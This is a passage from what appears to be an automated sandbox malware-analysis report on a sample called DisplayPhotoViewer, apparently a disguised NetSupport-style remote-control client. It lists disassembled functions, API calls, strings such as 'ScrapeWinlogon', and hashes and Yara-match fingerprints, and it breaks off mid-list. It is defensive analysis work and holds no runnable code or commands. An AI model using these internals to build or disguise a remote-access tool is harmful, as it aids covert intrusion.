                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset$CriticalInitializeSection_free
                                                                                                    • String ID: ..\CTL32\EncryptFuncs.cpp$pDES
                                                                                                    • API String ID: 1034327355-4272885995
                                                                                                    • Opcode ID: d8df8343139f9651ea179b102a598974dbd44d9f7f2bcb6fa37d555d27a18de6
                                                                                                    • Instruction ID: 44db7cba715f5ec9e8743322f4f81ded1efcc4351456725902015c0230d16d5d
                                                                                                    • Opcode Fuzzy Hash: d8df8343139f9651ea179b102a598974dbd44d9f7f2bcb6fa37d555d27a18de6
                                                                                                    • Instruction Fuzzy Hash: C741C7B5E04119AFDB60CF54CC41FAEB7B9EB85718F004298E9186B380EF31BE548B91
                                                                                                    Function 11055870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick
                                                                                                    • String ID: Stop reconn to %s
                                                                                                    • API String ID: 536389180-2663412807
                                                                                                    • Opcode ID: 7f93f5c60b66f6f66a655a38c164c4c0078e2809a5f1202980f7c73e012203d8
                                                                                                    • Instruction ID: 784773a31f0ef76a8b28eeacbae10346687d68afcbf10ed29864b8d9cefc3371
                                                                                                    • Opcode Fuzzy Hash: 7f93f5c60b66f6f66a655a38c164c4c0078e2809a5f1202980f7c73e012203d8
                                                                                                    • Instruction Fuzzy Hash: A331A131F102058FD7A0CF78D980A6AB7F9AF89314F1046AAE85AD7384EB31E944CB50
                                                                                                    Function 10701BE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 10701940: GetModuleHandleA.KERNEL32(NSMTRACE,10701A57), ref: 1070195A
                                                                                                    • wsprintfA.USER32 ref: 10701C5C
                                                                                                    • wvsprintfA.USER32(?,?,00000000), ref: 10701C85
                                                                                                    • OutputDebugStringA.KERNEL32(?), ref: 10701CFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DebugHandleModuleOutputStringwsprintfwvsprintf
                                                                                                    • String ID: %s:
                                                                                                    • API String ID: 3634490179-4275611816
                                                                                                    • Opcode ID: 4cac9b81bd97c159f535d9f53a1ddd87a8411de7201592205bc2e7c81cea786e
                                                                                                    • Instruction ID: 3313042287398766bc32277e51c1707280b49e727fe6768d637da24004752149
                                                                                                    • Opcode Fuzzy Hash: 4cac9b81bd97c159f535d9f53a1ddd87a8411de7201592205bc2e7c81cea786e
                                                                                                    • Instruction Fuzzy Hash: 8131E1706005186BDB68CB78AC859BF77A9EB45361F004369FC26C75D0EFB0DE828B94
                                                                                                    Function 110D1340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • getpeername.WSOCK32(?,00000000,00000000,218EC38C), ref: 110D13D0
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(111E0BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111E0BD0,00000000,000000FF,218EC38C,?,00000000,00000000,?,?,?,00000000,1117D21B), ref: 110D9983
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(11192F38,?,?,?,00000000,1117D21B,000000FF,?,110D7033,?,Invalid Server paramters), ref: 110D998A
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D13B2
                                                                                                      • Part of subcall function 11157E51: RaiseException.KERNEL32(?,?,111084C4,?,?,?,?,?,111084C4,?,111C0108), ref: 11157E93
                                                                                                    • inet_ntoa.WSOCK32(00000003), ref: 110D140E
                                                                                                    Strings
                                                                                                    • GetRemoteIPAddress() the socket is not connected, xrefs: 110D1380
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DebugOutputString$ExceptionException@8RaiseThrowgetpeernameinet_ntoa
                                                                                                    • String ID: GetRemoteIPAddress() the socket is not connected
                                                                                                    • API String ID: 3033480062-2838338745
                                                                                                    • Opcode ID: f67a2a6aba349b74b1afe1bb0bd9f9733d485f8bd67ad0e118c7723ebce24d98
                                                                                                    • Instruction ID: c8312da9112e31ef072ffc0594c0c1194be21931e72dfc95a9bfdd79bf2858e7
                                                                                                    • Opcode Fuzzy Hash: f67a2a6aba349b74b1afe1bb0bd9f9733d485f8bd67ad0e118c7723ebce24d98
                                                                                                    • Instruction Fuzzy Hash: 2A416DB1D003599FDB14CFA8C884BEEFBB9FB08718F50466DE466A3241EB756548CB90
                                                                                                    Function 1113D740 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 1113D768
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateErrorExitHeapLastMessageProcess_mallocwsprintf
                                                                                                    • String ID: ..\CTL32\uuencode.c$VUUU$buf
                                                                                                    • API String ID: 1213237569-523449816
                                                                                                    • Opcode ID: 12d8ce96e331268cef7e9b1b489254698880e1240f9d2a92e173167033825bf1
                                                                                                    • Instruction ID: 05387d3a0e98dca9ca3f3b6f4fecbbe6fc04c47979bb7c97398c77e30506bed9
                                                                                                    • Opcode Fuzzy Hash: 12d8ce96e331268cef7e9b1b489254698880e1240f9d2a92e173167033825bf1
                                                                                                    • Instruction Fuzzy Hash: CA217C362185C65BC7028F2D8C412C5FFE2AFC922D75CC095E4D98F346E572E515C791
                                                                                                    Function 11047950 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110479A6
                                                                                                    • GetTickCount.KERNEL32 ref: 110479C8
                                                                                                      • Part of subcall function 1103B130: CloseHandle.KERNEL32(00000000,110B2100,00000001,00000000,?), ref: 1103B1D2
                                                                                                    Strings
                                                                                                    • ScrapeWinlogon(false), xrefs: 110479ED
                                                                                                    • ScrapeWinlogon(true), mode=%x, flags=%x, xrefs: 11047983
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$CloseHandle
                                                                                                    • String ID: ScrapeWinlogon(false)$ScrapeWinlogon(true), mode=%x, flags=%x
                                                                                                    • API String ID: 3288320179-399146346
                                                                                                    • Opcode ID: f2da70192ea748e9f34c0dc608bbfc5127eac0f66cddfa81a88e06c54501c5c1
                                                                                                    • Instruction ID: ccefda0306997504386ffa10b0ea1e2f2bf74c184b008c30e10531185750030f
                                                                                                    • Opcode Fuzzy Hash: f2da70192ea748e9f34c0dc608bbfc5127eac0f66cddfa81a88e06c54501c5c1
                                                                                                    • Instruction Fuzzy Hash: F3213474F10B016BE712DAA098C5BAEB6D9ABC030CF104079FA8A5A2C0DBB17554C396
                                                                                                    Function 11037340 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _strtok.LIBCMT ref: 11037362
                                                                                                      • Part of subcall function 11158876: __getptd.LIBCMT ref: 11158894
                                                                                                    • _strtok.LIBCMT ref: 110373E3
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
                                                                                                    • String ID: ; >$CLTCONN.CPP
                                                                                                    • API String ID: 3120919156-788487980
                                                                                                    • Opcode ID: f14fa2139646d157dbe39acfd2d662c28a25447d49972a8ea342c89154dcd672
                                                                                                    • Instruction ID: db128bff47b3abe3fe11246236d2ade99bf76238e225518ade0ef558f75a81db
                                                                                                    • Opcode Fuzzy Hash: f14fa2139646d157dbe39acfd2d662c28a25447d49972a8ea342c89154dcd672
                                                                                                    • Instruction Fuzzy Hash: 45212475F00A476BE701DAA69C41B8EBBD89B84265F0440A9FE58AB341FA74ED0083E1
                                                                                                    Function 110476B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110E5A00: IsWindow.USER32(0000070B), ref: 110E5A0D
                                                                                                      • Part of subcall function 110E5A00: SendMessageA.USER32(0000070B,0000045F,0000070B,00000000), ref: 110E5A44
                                                                                                      • Part of subcall function 110E5A00: SendMessageA.USER32(0000070B,0000044B,00000000,?), ref: 110E5A76
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1104776E
                                                                                                    • SetCursor.USER32(00000000), ref: 11047775
                                                                                                      • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CursorFolderMessagePathSend$FileLoadModuleNameWindow
                                                                                                    • String ID: "%s%s" %s$nsmexec.exe
                                                                                                    • API String ID: 3894576003-3170401571
                                                                                                    • Opcode ID: fc034951f652329fed552b4d995688a30b4f0b45664675c741e07d543320d767
                                                                                                    • Instruction ID: 474df1859d4285f55e9963371b130ebdf3c3feee0e9b6e8767a7b1d967c1572f
                                                                                                    • Opcode Fuzzy Hash: fc034951f652329fed552b4d995688a30b4f0b45664675c741e07d543320d767
                                                                                                    • Instruction Fuzzy Hash: 1821DE72D04605ABD700CFA1CC84F9AF7A8EB01629F508179E81897680E779B6008BE2
                                                                                                    Function 11005840 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 11005881
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110058BC
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 3704029381-1557312927
                                                                                                    • Opcode ID: 006548d092e605309b07901970ac0f0a1f42638b8aed2354c93f73f7cf0c922c
                                                                                                    • Instruction ID: c8f121e53884fb9c95b9b706ef97250132daf4395f03128dde5ad018dc1f258f
                                                                                                    • Opcode Fuzzy Hash: 006548d092e605309b07901970ac0f0a1f42638b8aed2354c93f73f7cf0c922c
                                                                                                    • Instruction Fuzzy Hash: 28210335A00705AFF711CE25DC80FDBB3E9AF86358F00846DE9A98B280DB32B504CB52
                                                                                                    Function 110A5570 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 110A559B
                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 110A55E8
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$ErrorExitLastMessageProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2260967848-1557312927
                                                                                                    • Opcode ID: 19e3c1fe8c0f1b58243402a7cc324c8fbe65e83d634eb8f9150276d8f739c585
                                                                                                    • Instruction ID: 977d14c15c8ea9969de917a7632c4011be37bdaf01ac392639db5d23ee24297a
                                                                                                    • Opcode Fuzzy Hash: 19e3c1fe8c0f1b58243402a7cc324c8fbe65e83d634eb8f9150276d8f739c585
                                                                                                    • Instruction Fuzzy Hash: 8201F472D0463ABAD310CAA6EC98F45F759BB40378F118335F928A65C0EB72A951CBD1
                                                                                                    Function 1112F4B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11091420: LoadLibraryA.KERNEL32(USER32,?,?,1111146C), ref: 11091429
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1109143D
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1109144A
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11091457
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11091464
                                                                                                      • Part of subcall function 11091420: _memset.LIBCMT ref: 11091474
                                                                                                    • LoadLibraryA.KERNEL32(dwmapi.dll,218EC38C,?,?,00000000,00000000,Function_001725C8,000000FF,?,110F0770,?), ref: 1112F4F7
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMBlankWnd), ref: 1112F520
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
